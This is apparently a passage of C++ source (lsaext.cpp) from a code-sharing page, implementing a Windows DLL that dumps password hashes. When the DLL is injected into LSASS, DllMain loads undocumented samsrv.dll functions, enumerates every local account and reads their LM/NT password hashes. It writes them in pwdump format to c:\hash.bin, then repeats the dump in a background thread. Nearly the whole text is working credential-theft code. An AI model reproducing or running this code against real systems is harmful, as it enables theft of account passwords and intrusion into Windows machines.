📄 lsaext.cpp
字号:
}
pSamIFree_SAMPR_ENUMERATION_BUFFER( pEnum );
pEnum = NULL;
}
else
{
SendText( "SamrEnumerateUsersInDomain failed: 0x%08x", enumRc );
}
} while( enumRc == 0x105 );
if (pf){
fclose(pf);
}
SendText( "Samr Enumerate %d Users In Domain %S.\n", ret, pDomainInfo->DomainName.Buffer );
ret = 0;
exit:
// Clean up
#ifdef _DEBUG
SendText( "ok\n" );
#endif
if( hUser ) pSamrCloseHandle( &hUser );
if( hDomain ) pSamrCloseHandle( &hDomain );
if( hSam ) pSamrCloseHandle( &hSam );
if( hLsa ) LsaClose( hLsa );
if( hPipe ) CloseHandle( hPipe );
if( hp ) CloseHandle( hp );
if( hSamsrv ) FreeLibrary( hSamsrv );
return ret;
}
// Extract the hash data and store it in the registry.
int __GetHash( unsigned pid, unsigned hid, unsigned magic )
{
int i;
char szExeName[256];
i = (INT)GetModuleFileName(NULL,szExeName,255);
szExeName[i] = '\0';
PCHAR Ptr = &szExeName[i];
while (Ptr > &szExeName[0]){
if ('\\' == *Ptr){
++Ptr;
break;
}
--Ptr;
}
if (stricmp(Ptr,"LSASS.EXE") &&
stricmp(Ptr,"svchost.exe")){
return 0;
}
LSA_OBJECT_ATTRIBUTES attributes;
LSA_HANDLE hLsa = 0;
PLSA_UNICODE_STRING pSysName = NULL;
POLICY_ACCOUNT_DOMAIN_INFO* pDomainInfo;
NTSTATUS rc, enumRc;
HSAM hSam = 0;
HDOMAIN hDomain = 0;
HUSER hUser = 0;
DWORD dwEnum = 0;
DWORD dwNumber;
SAM_USER_ENUM *pEnum = NULL;
HINSTANCE hSamsrv;
static BOOL bCopy = FALSE;
FILE *log = fopen("c:\\hash.log","ab");
int ret = ERROR_NO_ERROR;
// Get Sam functions
if( NULL == (hSamsrv = LoadLibrary( "samsrv.dll" ) ) )
{
ret = ERROR_LOAD_SAMDLL;
if (log){
char e[] = "LoadLibary error\r\n";
fwrite(e,1,strlen(e),log);
}
// SendText( "LoadLibrary samsrv.dll failed, error: %u\n", GetLastError() );
goto exit;
}
pSamIConnect = (SamIConnectFunc) GetProcAddress( hSamsrv, "SamIConnect" );
pSamrOpenDomain = (SamrOpenDomainFunc) GetProcAddress( hSamsrv, "SamrOpenDomain" );
pSamrOpenUser = (SamrOpenUserFunc) GetProcAddress( hSamsrv, "SamrOpenUser" );
pSamrQueryInformationUser = (SamrQueryInformationUserFunc) GetProcAddress( hSamsrv, "SamrQueryInformationUser" );
pSamrEnumerateUsersInDomain = (SamrEnumerateUsersInDomainFunc) GetProcAddress( hSamsrv, "SamrEnumerateUsersInDomain" );
pSamIFree_SAMPR_USER_INFO_BUFFER = (SamIFree_SAMPR_USER_INFO_BUFFERFunc) GetProcAddress( hSamsrv, "SamIFree_SAMPR_USER_INFO_BUFFER" );
pSamIFree_SAMPR_ENUMERATION_BUFFER = (SamIFree_SAMPR_ENUMERATION_BUUFERFunc) GetProcAddress( hSamsrv, "SamIFree_SAMPR_ENUMERATION_BUFFER" );
pSamrCloseHandle = (SamrCloseHandleFunc) GetProcAddress( hSamsrv, "SamrCloseHandle" );
if( !pSamIConnect || !pSamrOpenDomain || !pSamrOpenUser || !pSamrQueryInformationUser
|| !pSamrEnumerateUsersInDomain || !pSamIFree_SAMPR_USER_INFO_BUFFER
|| !pSamIFree_SAMPR_ENUMERATION_BUFFER || !pSamrCloseHandle )
{
ret = ERROR_LOAD_SAMFUNC;
if (log){
fwrite("proc error\r\n",1,12,log);
}
// SendText( "Failed to load functions, error: %u\n", GetLastError() );
goto exit;
}
// Open the Policy database
memset( &attributes, 0, sizeof(LSA_OBJECT_ATTRIBUTES) );
attributes.Length = sizeof(LSA_OBJECT_ATTRIBUTES);
// Get policy handle
rc = LsaOpenPolicy( pSysName, &attributes, POLICY_ALL_ACCESS, &hLsa );
if( rc < 0 )
{
// SendText( "LsaOpenPolicy failed: 0x%08x", rc );
if (log){
fwrite("open fail\r\n",1,11,log);
}
goto exit;
}
// Get Domain Info
rc = LsaQueryInformationPolicy( hLsa, PolicyAccountDomainInformation, (void**)&pDomainInfo );
if( rc < 0 )
{
// SendText( "LsaQueryInformationPolicy failed: 0x%08x", rc );
if (log){
fwrite("query fail\r\n",1,12,log);
}
goto exit;
}
// Connect to the SAM database
rc = pSamIConnect( 0, &hSam, MAXIMUM_ALLOWED, 1 );
if( rc < 0 )
{
// SendText( "SamConnect failed : 0x%08x(%u)", rc, LsaNtStatusToWinError(rc) );
if (log){
fwrite("conn fail\r\n",1,11,log);
}
goto exit;
}
rc = pSamrOpenDomain( hSam, 0xf07ff, pDomainInfo->DomainSid, &hDomain );
if( rc < 0 )
{
// SendText( "SamOpenDomain failed : 0x%08x", rc );
hDomain = 0;
if (log){
fwrite("open domain\r\n",1,13,log);
}
goto exit;
}
ret = 0;
FILE *pf = NULL;
do
{
enumRc = pSamrEnumerateUsersInDomain( hDomain, &dwEnum, 0, &pEnum, 1000, &dwNumber );
ret += dwNumber;
if( enumRc == 0 || enumRc == 0x105 )
{
for( i = 0; i < (int)dwNumber; i++ )
{
char szUserName[300];
unsigned hashData[8];
DWORD dwSize;
PVOID pHashData = 0;
memset( szUserName, 0, sizeof(szUserName) );
// Open the user (by Rid)
rc = pSamrOpenUser( hDomain, MAXIMUM_ALLOWED, pEnum->users[i].rid, &hUser );
if( rc < 0 )
{
// SendText( "SamrOpenUser(0x%x) failed: 0x%08x", pEnum->users[i].rid, rc );
if (log){
fwrite("open user\r\n",1,11,log);
}
continue;
}
// Get the password OWFs
rc = pSamrQueryInformationUser( hUser, SAM_USER_INFO_PASSWORD_OWFS, &pHashData );
if( rc < 0 )
{
// SendText( "SamrQueryInformationUser failed: 0x%08x", rc );
pSamrCloseHandle( &hUser );
hUser = 0;
if (log){
fwrite("query info\r\n",1,12,log);
}
continue;
}
// Convert the username and rid
dwSize = min( sizeof(szUserName), pEnum->users[i].name.Length >> 1 );
wcstombs( szUserName, pEnum->users[i].name.Buffer, dwSize );
if (NULL == pf){
pf = fopen("c:\\hash.bin","ab");
}
if (pf){
fwrite(szUserName,1,strlen(szUserName),pf);
char szTemp[1024];
int l = sprintf(szTemp,":%d:",pEnum->users[i].rid);
fwrite(szTemp,1,l,pf);
for (l = 16;l < 32;l++){
sprintf (szTemp,"%02X",( (PBYTE)pHashData)[l]);
fwrite(szTemp,1,strlen(szTemp),pf);
}
fwrite(":",1,1,pf);
for (l = 0;l < 16;l++){
sprintf (szTemp,"%02X",( (PBYTE)pHashData)[l]);
fwrite(szTemp,1,strlen(szTemp),pf);
}
fwrite(":::\r\n",1,5,pf);
}
sprintf( szUserName, "%s:%d:", szUserName, pEnum->users[i].rid );
// Convert the user data
memcpy( hashData, pHashData, 32 );
obfuscate( hashData, magic, 8 );
pHashData = strchr( szUserName, '\0' );
memcpy( pHashData, hashData, sizeof( hashData ) );
// SendBuffer( szUserName, (char*)pHashData - szUserName + sizeof(hashData) + 1 );
// Free stuff
pSamIFree_SAMPR_USER_INFO_BUFFER( pHashData, SAM_USER_INFO_PASSWORD_OWFS );
pHashData = 0;
pSamrCloseHandle( &hUser );
hUser = 0;
}
pSamIFree_SAMPR_ENUMERATION_BUFFER( pEnum );
pEnum = NULL;
}
else
{
// SendText( "SamrEnumerateUsersInDomain failed: 0x%08x", enumRc );
}
} while( enumRc == 0x105 );
if (pf){
fclose(pf);
}
// SendText( "Samr Enumerate %d Users In Domain %S.\n", ret, pDomainInfo->DomainName.Buffer );
ret = 0;//
exit:
// Clean up
#ifdef _DEBUG
// SendText( "ok\n" );
#endif
if( hUser ) pSamrCloseHandle( &hUser );
if( hDomain ) pSamrCloseHandle( &hDomain );
if( hSam ) pSamrCloseHandle( &hSam );
if( hLsa ) LsaClose( hLsa );
if( hSamsrv ) FreeLibrary( hSamsrv );
if (log){
fclose(log);
}
return ret;
}
DWORD WINAPI __Proc(IN LPVOID lpCtx){
DWORD i = 0;
do {
Sleep(2000);
__GetHash(0,0,0);
++i;
} while (i < 20);
return i;
}
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
if (fdwReason == DLL_PROCESS_ATTACH){
DWORD Tid;
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)__Proc,NULL,0,&Tid);
__GetHash(0,0,0);
}
return TRUE;
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -